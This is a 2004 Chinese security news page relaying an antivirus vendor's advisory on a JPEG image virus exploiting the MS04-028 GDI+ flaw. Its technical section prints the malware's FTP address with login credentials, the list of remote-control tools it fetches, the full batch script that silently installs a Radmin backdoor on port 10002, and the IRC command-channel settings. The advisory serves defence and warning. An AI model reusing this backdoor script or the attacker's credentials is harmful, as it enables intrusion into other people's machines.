您的位置:首页网络冲浪安全资讯 → 首个JPEG病毒携木马来袭 病毒攻击第一波

首个JPEG病毒携木马来袭 病毒攻击第一波

时间:2004/10/15 0:26:00来源:本站整理作者:蓝点我要评论(0)

    利用微软新漏洞的图片病毒“图片骇客”(Exploit.Win32.MS04-028.gen)终于现身了,用户在浏览互联网图片时就会被木马病毒感染。这种图片病毒最要命的是用户在不知不觉当中就会中木马病毒,从而被远程计算机得到控制权。金山毒霸反病毒专家认为,如果用户浏览了带毒电子图片,就有可能泄露比如:网络游戏密码、QQ账号、个人银行密码等关键信息,而且这种图片病毒有可能是美女、风景、小动物、甚至是好友的照片!让人防不甚防。



据金山毒霸反病毒中心监测,到目前为止这种图片病毒感染的例子还不多,但是这说明利用这个漏洞来传播的图片病毒现身了,第一波图片病毒攻击已经开始。最为可怕的是,以后还会有各种攻击出现,不仅会带木马病毒,包括一些恶性蠕虫、破坏数据的病毒都会以图片病毒作为掩饰来进行破坏。



金山反病毒中心介绍,该图片病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的。



专家提醒:用户应立即打上各种应用程序补丁,如果怀疑机器染毒,电脑用户可查看机器10002端口有无程序访问,以防木马病毒偷盗各种密码。



目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。并且免费提供图片病毒专杀工具(下载地址:http://db.kingsoft.com/special/virtusspecial/JPEG/index.shtml),欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。



技术资料分析:



病毒名称:Exploit.JPEG



病毒长度:4098



威胁级别:二级



中文名称:图片骇客



病毒别名:



Exploit.Win32.MS04-028.gen[AVP]



受影响系统:未打MS04-028补丁的英文版WinXP SP1



发现时间:9月28日



病毒简介:



金山反病毒中心介绍,该病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的



技术细节:



当用户通过资源管理器浏览该文件后,病毒会利用GDI+漏洞,尝试溢出执行下载命令。如果溢出失败,则会导致资源管理器崩溃



如果溢出成功,则病毒尝试从以下FTP上下载远程控制文件



ftp://2××.1××.4×.2×/www/system/



文件包括:



文件名 大小



AdmDll.dll 90112



Fport.exe 114688



ServUStartUpLog.txt 663



VNCHooks.dll 32768



WinRun.dll 1407



WinRun.exe 811008



driver.log 1268



drives.exe 24576



execute.bat 150



filter3.ocx 0



irc-u.cfg 1052



irc-u.dat 0



irc-u.debug.log 16802



irc-u.dll 102400



kill.exe 26624



nc.exe 59392



nvsvc.exe 241664



nvsvc32.dll 36864



omnithread_rt.dll 45056



peek.exe 34304



raddrv.dll 29408



radmin.reg 713



rcrypt.exe 26112



reg.exe 40960



uptime.exe 6656



vns.exe 208896



3、运行execute.bat 文件,通过Radmin远程管理工具,建立后门,端口为10002。



4、会建立一个IRC连接,连接到#FurQ频道。



0.其他信息:



FTP地址如下:



ftp://209.171.43.27/www/system/



用户名:bawz



密码:pagdba



execute.bat 内容如下



regedit.exe /s radmin.reg



nvsvc.exe /install /silence



nvsvc.exe /pass:hardcore /port:10002 /save /silence



nvsvc.exe /start /silence



net start r_server



IRC配置文件如下:



server1=irc.p2pchat.net



port1=7777



login=Darkbro0d



channel=#FurQ



password=letmein



nick1=Track100Mbit



nick2=Trck100#1



sfv=1



user=Trackmaster



login=darkbro0d



目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 设置高强度密码技巧之

最新文章 360连回家是什么 360wifi密码怎么设置才不 电信级的RSA加密后的密码的破解方法范海辛的惊奇之旅分辨率修改方法eset nod32 最新用户名和密码 eset nod32 最关于近期PC6遭受DDOS攻击声明

人气排行 盗号者的常用盗号方法最新瑞星升级助手v7.1.5及防杀方法wifi密码怎么设置才不会被破解?wifi防蹭网网站Tags标签对网站关键词排名的意义eset nod32 最新用户名和密码 eset nod32 最网站导航栏设计趋势目前最新的计算机病毒有哪些如何彻底删除QQ医生